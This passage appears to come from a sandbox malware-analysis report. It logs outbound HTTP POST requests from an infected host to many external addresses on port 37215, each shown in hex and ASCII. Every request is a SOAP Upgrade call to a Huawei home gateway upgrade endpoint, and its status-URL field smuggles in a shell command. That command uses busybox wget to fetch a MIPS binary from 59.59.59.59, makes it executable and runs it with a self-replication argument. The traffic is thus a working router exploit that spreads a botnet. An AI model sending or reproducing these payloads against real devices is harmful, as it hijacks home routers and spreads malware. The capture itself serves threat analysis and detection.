2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2076192.168.2.1553668196.251.224.1937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.086648941 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2077192.168.2.1555080197.198.82.7437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.086679935 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2078192.168.2.1553402197.103.122.8237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.086692095 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2079192.168.2.1540154197.1.28.9037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.087047100 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2080192.168.2.1537040197.215.74.13937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.091967106 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2081192.168.2.1549824157.44.112.12137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.092039108 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2082192.168.2.154092641.50.228.5537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.092076063 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2083192.168.2.1554196197.57.143.24537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.092489004 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2084192.168.2.1535666157.52.62.22837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.097153902 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2085192.168.2.155896241.240.86.6437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.051851034 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2086192.168.2.1559942157.83.47.23337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.051872969 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
